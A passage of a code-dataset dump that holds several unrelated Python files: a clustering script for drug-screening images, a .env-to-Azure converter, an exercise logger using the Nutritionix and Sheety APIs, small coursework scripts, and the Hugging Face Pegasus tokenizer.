conc_centric_analysis(metadata=metadata,\n # cluster_labels=labels,\n # path_fig=path_fig)\n\n np.save('eval_metric', summary_eval_metrics)\n\n 
os.chdir(path_fig)\n\n plot_eval_metrics(list_nclus,\n summary_eval_metrics,\n path_fig)\n os.chdir(path_out)\n\n labels = np.load(\"labels_nclus_8.npy\")\n\n get_raw_images(metadata=metadata,\n cluster_labels=labels,\n output_path='\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\figures\\\\pheno-ml\\\\images_by_cluster',\n n_images_per_cluster=3\n )\n\n labels_eff = biological_inference_of_clusters(chosen_cluster = labels,\n path_fig = path_fig)\n\n os.chdir(path_out)\n\n np.save('labels_nclus_bio-effect', labels_eff)\n\n get_raw_images(metadata = metadata,\n cluster_labels = labels_eff,\n output_path='\\\\\\\\d.ethz.ch\\\\groups\\\\biol\\\\sysbc\\\\sauer_1\\\\users\\Mauro\\\\Cell_culture_data\\\\190310_LargeScreen\\\\figures\\\\pheno-ml\\\\images_by_cluster_eff',\n n_images_per_cluster=3\n )\n\n drug_centric_analysis(metadata=metadata,\n cluster_labels=labels_eff,\n path_fig=path_fig,\n heatmap_label=\"_drug_biological_labels\")\n\n drug_conc_centric_analysis(metadata = metadata,\n cluster_labels=labels_eff,\n path_fig = path_fig)\n\n max_conc_analysis(metadata = metadata,\n cluster_labels = labels_eff,\n path_fig = path_fig,\n heatmap_label= \"max_conc_gram\")\n\n\n\n\n","repo_name":"mauromiguelm/toxicity-classifier","sub_path":"main/cluster_of_distances.py","file_name":"cluster_of_distances.py","file_ext":"py","file_size_in_byte":26372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"17988387295","text":"import json\nimport os\nimport re\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser(\n prog=\"env2azure\",\n description=(\n \"Converts a .env to file to the equivalent json file which can\"\n \" be used to configure an Azure App Service.\"\n ),\n)\nparser.add_argument(\"file_path\", help=\"Absolute path to the .env file to be converted\")\nparser.add_argument(\n \"--add\",\n nargs=\"*\",\n help=(\"Adds additional environment variables. Should follow format\" ' VAR=\"value\"'),\n)\nparser.add_argument(\n \"--o\",\n nargs=\"?\",\n default=os.path.join(os.getcwd(), \"azure_settings.json\"),\n help=(\n \"Path to the output file. 
By default, creates a JSON file named\"\n \" azure_settings.json in the current directory.\"\n ),\n)\n\n\ndef convert_dotenv_to_env_dict(file_path: str, extras: list[str]):\n env_dict = {}\n\n if len(extras) != 0:\n for extra in extras:\n var, value = extra.split(\"=\", 1)\n env_dict[var] = value\n \n with open(file_path, \"r\") as file:\n for line in file.readlines():\n line = line.strip()\n line = line.strip(\"\\n\")\n\n # ignoring new lines and comments\n if len(line) > 0 and line[0] != \"#\":\n var, value = line.split(\"=\", 1)\n value = value.strip()\n var = var.strip()\n\n # removing quotes to avoid weird strings\n if value[0] == '\"':\n value = value[1:-1]\n \n env_dict[var] = value\n \n return env_dict\n\n\ndef format_variables(env_dict: dict[str, str]):\n for key in env_dict:\n if \"${\" in env_dict[key]:\n key_list = re.findall(r'\\$\\{(?P[A-Z_]+)\\}', env_dict[key])\n env_dict[key] = env_dict[key].replace(\"${\", \"{\")\n format_dict = { i: env_dict[i] for i in key_list }\n value = env_dict[key].format(**format_dict)\n env_dict[key] = value\n return env_dict\n\n\ndef convert_dotenv_to_json(file_path: str, extras: list[str], output_file_path: str):\n json_data = []\n env_dict = convert_dotenv_to_env_dict(file_path, extras)\n env_dict = format_variables(env_dict)\n\n for key, value in env_dict.items():\n json_data.append({\n \"name\": key,\n \"value\": value,\n \"slotSetting\": False\n })\n\n if output_file_path is None:\n output_file_path = os.path.join(os.getcwd(), \"azure_settings.json\")\n\n with open(output_file_path, \"w\") as json_file:\n json.dump(json_data, json_file, indent=4)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n convert_dotenv_to_json(args.file_path, args.add, args.o)\n","repo_name":"IshaanBoseCS/env2azure","sub_path":"dotenv_to_azure_settings.py","file_name":"dotenv_to_azure_settings.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19046770411","text":"import requests\nfrom dotenv import load_dotenv\nimport os\nimport datetime as dt\n\nGENDER = \"Male\"\nWEIGHT_KG = 75\nHEIGHT_CM = 178\nAGE = 39\n\n# getting actual directory and making a rel path\nREL_PATH = f\"{os.path.dirname(__file__)}/\"\n\n# loading environment variables\nload_dotenv(dotenv_path=f\"{REL_PATH}.env\")\n\n# exercise API\nNUTRITIONIX_APPID = os.getenv(\"NUTRITIONIX_APPID\")\nNUTRITIONIX_APIKEY = os.getenv(\"NUTRITIONIX_APIKEY\")\nNUTRITIONIX_ENDPOINT = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\nNUTRITIONIX_HEADERS = {\n \"x-app-id\": NUTRITIONIX_APPID,\n \"x-app-key\": NUTRITIONIX_APIKEY,\n \"Content-Type\": \"application/json\",\n}\nexercise_data = {\n \"query\": \"2 hour cycling\",\n # \"query\": input(\"Type the exercise: \"),\n \"gender\": GENDER,\n \"weight_kg\": WEIGHT_KG,\n \"height_cm\": HEIGHT_CM,\n \"age\": AGE\n}\nresponse = requests.post(url=NUTRITIONIX_ENDPOINT,\n headers=NUTRITIONIX_HEADERS,\n json=exercise_data)\nexercise_response = response.json()[\"exercises\"][0]\nexercise_name = exercise_response[\"name\"]\nexercise_duration = exercise_response[\"duration_min\"]\nexercise_calories = exercise_response[\"nf_calories\"]\n\ntoday = dt.datetime.now()\ntoday_date = today.strftime(\"%d/%m/%Y\")\ntoday_time = today.strftime(\"%X\")\n\n# sheet write API\nSHEETY_API_ENDPOINT = \"https://api.sheety.co/3955488f8ee023601d308d21b9639dd3/myWorkouts/home\"\nSHEETY_APIKEY = os.getenv(\"SHEETY_APIKEY\")\nSHEETY_HEADERS = {\n \"Authorization\": 
SHEETY_APIKEY,\n \"Content-Type\": \"application/json\"\n}\nsheet_data = {\n \"home\": {\n \"date\": today_date,\n \"time\": today_time,\n \"exercise\": exercise_name,\n \"duration\": exercise_duration,\n \"calories\": exercise_calories,\n }\n}\nresponse = requests.post(url=SHEETY_API_ENDPOINT,\n headers=SHEETY_HEADERS,\n json=sheet_data)","repo_name":"davibelo/python-pro-bootcamp-2021","sub_path":"04-projects-UsingWebAPIs/08-workoutTracking/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28638350252","text":"import os\nos.chdir(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\python_operation\")\nos.getcwd()\nf = open('rosalind_hamm.txt','r')\n\nlines = f.readlines()\n\nf.close()\n\ns1 = lines[0].strip()\n\ns2 = lines[1].strip()\n\nhd = 0\n\nfor i in range(len(s1)):\n\n if s1[i] != s2[i]:\n\n hd += 1\n\nprint(hd)","repo_name":"CoolEvilgenius/notes_2020_zhiyuanli","sub_path":"rosalind/rosalind_code/practice_rosalind_6.py","file_name":"practice_rosalind_6.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71636526679","text":"#!/usr/bin/env python\n\nimport sys\n\nfor line in sys.stdin:\n line = line.strip()\n key = line.split(',')[0]\n value = line.split(',')[1]\n if value == 'ABC' or value.isdigit():\n print('{0}\\t{1}'.format(key, value))\n\n","repo_name":"learicard/coursework","sub_path":"hadoop/assignments/ex1/join2_mapper.py","file_name":"join2_mapper.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21461669487","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\n\ndef hist_plot(dist):\n return plt.hist(dist, 50, normed=True, color='r', edgecolor='black', linewidth=0.5)\n\ndef beautiful_bins(bins, y_line, title=\"Test\", x_label=\"X Label\", y_label=\"Y Label\", format=\"png\"):\n plt.title(title)\n plt.plot(bins, y_line, linewidth=2, color='black')\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n ax = plt.subplot(111)\n ax.set_ylim(ymin=0)\n ax.set_xlim(xmin=0)\n plt.savefig(\"./imgs/{}.{}\".format(title.lower(), format), format=format)\n plt.show()","repo_name":"sacry-/mdp4","sub_path":"mesa_tb/testing/pystyler.py","file_name":"pystyler.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28703017754","text":"import os\nfrom shutil import copyfile\nfrom typing import Any, Dict, List, Optional, Tuple\n\nimport sentencepiece as spm\n\nfrom ...tokenization_utils import AddedToken, PreTrainedTokenizer\nfrom ...utils import logging\n\n\nSPIECE_UNDERLINE = \"▁\"\n\nVOCAB_FILES_NAMES = {\"vocab_file\": \"spiece.model\"}\n\nPRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\"google/pegasus-xsum\": \"https://huggingface.co/google/pegasus-xsum/resolve/main/spiece.model\"}\n}\n\nPRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n \"google/pegasus-xsum\": 512,\n}\n\n\nlogger = logging.get_logger(__name__)\n\n\n# TODO ArthurZ refactor this to only use the added_tokens_encoder\nclass PegasusTokenizer(PreTrainedTokenizer):\n r\"\"\"\n Construct a PEGASUS tokenizer. Based on [SentencePiece](https://github.com/google/sentencepiece).\n\n This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. 
Users should refer to\n this superclass for more information regarding those methods.\n\n Args:\n vocab_file (`str`):\n [SentencePiece](https://github.com/google/sentencepiece) file (generally has a *.spm* extension) that\n contains the vocabulary necessary to instantiate a tokenizer.\n pad_token (`str`, *optional*, defaults to `\"\"`):\n The token used for padding, for example when batching sequences of different lengths.\n eos_token (`str`, *optional*, defaults to `\"
\"`):\n The end of sequence token.\n\n \n\n When building a sequence using special tokens, this is not the token that is used for the end of sequence.\n The token used is the `sep_token`.\n\n \n\n unk_token (`str`, *optional*, defaults to `\"\"`):\n The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this\n token instead.\n mask_token (`str`, *optional*, defaults to `\"\"`):\n The token used for masking single token values. This is the token used when training this model with masked\n language modeling (MLM). This is the token that the PEGASUS encoder will try to predict during pretraining.\n It corresponds to *[MASK2]* in [PEGASUS: Pre-training with Extracted Gap-sentences for Abstractive\n Summarization](https://arxiv.org/pdf/1912.08777.pdf).\n mask_token_sent (`str`, *optional*, defaults to `\"\"`):\n The token used for masking whole target sentences. This is the token used when training this model with gap\n sentences generation (GSG). This is the sentence that the PEGASUS decoder will try to predict during\n pretraining. It corresponds to *[MASK1]* in [PEGASUS: Pre-training with Extracted Gap-sentences for\n Abstractive Summarization](https://arxiv.org/pdf/1912.08777.pdf).\n additional_special_tokens (`List[str]`, *optional*):\n Additional special tokens used by the tokenizer. If no additional_special_tokens are provided and\n are used as additional special tokens corresponding to the [original PEGASUS\n tokenizer](https://github.com/google-research/pegasus/blob/939830367bcf411193d2b5eca2f2f90f3f9260ca/pegasus/ops/pretrain_parsing_ops.cc#L66)\n that uses the tokens 2 - 104 only for pretraining\n sp_model_kwargs (`dict`, *optional*):\n Will be passed to the `SentencePieceProcessor.__init__()` method. The [Python wrapper for\n SentencePiece](https://github.com/google/sentencepiece/tree/master/python) can be used, among other things,\n to set:\n\n - `enable_sampling`: Enable subword regularization.\n - `nbest_size`: Sampling parameters for unigram. 
Invalid for BPE-Dropout.\n\n - `nbest_size = {0,1}`: No sampling is performed.\n - `nbest_size > 1`: samples from the nbest_size results.\n - `nbest_size < 0`: assuming that nbest_size is infinite and samples from the all hypothesis (lattice)\n using forward-filtering-and-backward-sampling algorithm.\n\n - `alpha`: Smoothing parameter for unigram sampling, and dropout probability of merge operations for\n BPE-dropout.\n \"\"\"\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n model_input_names = [\"input_ids\", \"attention_mask\"]\n\n def __init__(\n self,\n vocab_file,\n pad_token=\"\",\n eos_token=\"\",\n unk_token=\"\",\n mask_token=\"\",\n mask_token_sent=\"\",\n additional_special_tokens=None,\n offset=103, # entries 2 - 104 are only used for pretraining\n sp_model_kwargs: Optional[Dict[str, Any]] = None,\n **kwargs,\n ) -> None:\n self.offset = offset\n if additional_special_tokens is not None:\n if not isinstance(additional_special_tokens, list):\n raise TypeError(\n f\"additional_special_tokens should be of type {type(list)}, but is\"\n f\" {type(additional_special_tokens)}\"\n )\n additional_special_tokens_extended = (\n ([mask_token_sent] + additional_special_tokens)\n if mask_token_sent not in additional_special_tokens and mask_token_sent is not None\n else additional_special_tokens\n )\n # fill additional tokens with ..., in case not all additional tokens are already taken\n additional_special_tokens_extended += [\n f\"\" for i in range(len(additional_special_tokens_extended), self.offset - 1)\n ]\n\n if len(set(additional_special_tokens_extended)) != len(additional_special_tokens_extended):\n raise ValueError(\n \"Please make sure that the provided additional_special_tokens do not contain an incorrectly\"\n f\" shifted list of tokens. 
Found {additional_special_tokens_extended}.\"\n )\n additional_special_tokens = additional_special_tokens_extended\n else:\n additional_special_tokens_extended = []\n additional_special_tokens = [mask_token_sent] if mask_token_sent is not None else []\n additional_special_tokens += [f\"\" for i in range(2, self.offset)]\n\n self.sp_model_kwargs = {} if sp_model_kwargs is None else sp_model_kwargs\n self.mask_token_sent = mask_token_sent\n self.vocab_file = vocab_file\n self.sp_model = spm.SentencePieceProcessor(**self.sp_model_kwargs)\n self.sp_model.Load(vocab_file)\n\n _added_tokens_decoder = {\n 0: AddedToken(str(pad_token), special=True),\n 1: AddedToken(str(eos_token), special=True),\n }\n\n if self.mask_token_sent is not None:\n _added_tokens_decoder[2] = AddedToken(mask_token_sent, special=True)\n _added_tokens_decoder[3] = AddedToken(str(mask_token), special=True)\n\n for i in range(2, self.offset):\n _added_tokens_decoder[len(_added_tokens_decoder)] = AddedToken(f\"\", special=True)\n\n # Force update as we want to make sure vocab is enforced (same as fast)\n self._added_tokens_decoder = kwargs.pop(\"added_tokens_decoder\", {})\n self._added_tokens_decoder.update(_added_tokens_decoder)\n\n super().__init__(\n eos_token=eos_token,\n unk_token=unk_token,\n mask_token=mask_token,\n pad_token=pad_token,\n mask_token_sent=mask_token_sent,\n offset=offset,\n additional_special_tokens=additional_special_tokens,\n sp_model_kwargs=self.sp_model_kwargs,\n **kwargs,\n )\n\n @property\n def vocab_size(self) -> int:\n return len(self.sp_model) + self.offset\n\n def get_vocab(self) -> Dict[str, int]:\n vocab = {self.convert_ids_to_tokens(i): i for i in range(self.vocab_size)}\n vocab.update(self.added_tokens_encoder)\n return vocab\n\n def __getstate__(self):\n state = self.__dict__.copy()\n state[\"sp_model\"] = None\n return state\n\n def __setstate__(self, d):\n self.__dict__ = d\n\n # for backward compatibility\n if not hasattr(self, \"sp_model_kwargs\"):\n self.sp_model_kwargs = {}\n\n self.sp_model = spm.SentencePieceProcessor(**self.sp_model_kwargs)\n self.sp_model.Load(self.vocab_file)\n\n def _tokenize(self, text: str) -> List[str]:\n \"\"\"Take as input a string and return a list of strings (tokens) for words/sub-words\"\"\"\n return self.sp_model.encode(text, out_type=str)\n\n def _convert_token_to_id(self, token: str) -> int:\n \"\"\"Converts a token (str) to an id using the vocab.\"\"\"\n sp_id = self.sp_model.piece_to_id(token)\n return sp_id + self.offset\n\n def _convert_id_to_token(self, index: int) -> str:\n \"\"\"Converts an index (integer) to a token (str) using the vocab.\"\"\"\n if index < self.offset:\n return self.sp_model.IdToPiece(index)\n token = self.sp_model.IdToPiece(index - self.offset)\n return token\n\n def convert_tokens_to_string(self, tokens):\n \"\"\"Converts a sequence of tokens (string) in a single string.\"\"\"\n current_sub_tokens = []\n out_string = \"\"\n for token in tokens:\n # make sure that special tokens are not decoded using sentencepiece model\n if token in self.all_special_tokens:\n out_string += self.sp_model.decode(current_sub_tokens) + token\n current_sub_tokens = []\n else:\n current_sub_tokens.append(token)\n out_string += self.sp_model.decode(current_sub_tokens)\n return out_string.strip()\n\n def num_special_tokens_to_add(self, pair=False):\n \"\"\"Just EOS\"\"\"\n return 1\n\n def _special_token_mask(self, seq):\n all_special_ids = set(self.all_special_ids) # call it once instead of inside list comp\n 
all_special_ids.remove(self.unk_token_id) # is only sometimes special\n\n return [1 if x in all_special_ids else 0 for x in seq]\n\n def get_special_tokens_mask(\n self, token_ids_0: List, token_ids_1: Optional[List] = None, already_has_special_tokens: bool = False\n ) -> List[int]:\n \"\"\"Get list where entries are [1] if a token is [eos] or [pad] else 0.\"\"\"\n if already_has_special_tokens:\n return self._special_token_mask(token_ids_0)\n elif token_ids_1 is None:\n return self._special_token_mask(token_ids_0) + [1]\n else:\n return self._special_token_mask(token_ids_0 + token_ids_1) + [1]\n\n def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None) -> List[int]:\n \"\"\"\n Build model inputs from a sequence or a pair of sequences for sequence classification tasks by concatenating\n and adding special tokens. A PEGASUS sequence has the following format, where `X` represents the sequence:\n\n - single sequence: `X `\n - pair of sequences: `A B ` (not intended use)\n\n BOS is never used. Pairs of sequences are not the expected use case, but they will be handled without a\n separator.\n\n Args:\n token_ids_0 (`List[int]`):\n List of IDs to which the special tokens will be added.\n token_ids_1 (`List[int]`, *optional*):\n Optional second list of IDs for sequence pairs.\n\n Returns:\n `List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.\n \"\"\"\n if token_ids_1 is None:\n return token_ids_0 + [self.eos_token_id]\n # We don't expect to process pairs, but leave the pair logic for API consistency\n return token_ids_0 + token_ids_1 + [self.eos_token_id]\n\n def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:\n if not os.path.isdir(save_directory):\n logger.error(f\"Vocabulary path ({save_directory}) should be a directory\")\n return\n out_vocab_file = os.path.join(\n save_directory, (filename_prefix + \"-\" if filename_prefix else \"\") + VOCAB_FILES_NAMES[\"vocab_file\"]\n )\n\n if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file) and os.path.isfile(self.vocab_file):\n copyfile(self.vocab_file, out_vocab_file)\n elif not os.path.isfile(self.vocab_file):\n with open(out_vocab_file, \"wb\") as fi:\n content_spiece_model = self.sp_model.serialized_model_proto()\n fi.write(content_spiece_model)\n\n return (out_vocab_file,)\n","repo_name":"huggingface/transformers","sub_path":"src/transformers/models/pegasus/tokenization_pegasus.py","file_name":"tokenization_pegasus.py","file_ext":"py","file_size_in_byte":12861,"program_lang":"python","lang":"en","doc_type":"code","stars":115573,"dataset":"github-code","pt":"85"} +{"seq_id":"13820581922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 28 23:36:18 2018\n\n@author: in-qu\n\"\"\"\nimport numpy as np\nfrom sigmoid import sigmoid\n\ndef costFunction(theta, X, y):\n theta = theta.reshape(-1,1)\n y = y.reshape(-1,1)\n m = len(y)\n J = -1 / m * (y.T @ np.log(sigmoid(X @ theta)) + (1 - y.T) @ np.log(1 - sigmoid(X @ theta)))\n \n return J\n \n ","repo_name":"agasca94/MachineLearningExercises","sub_path":"ex2-python/costFunction.py","file_name":"costFunction.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"}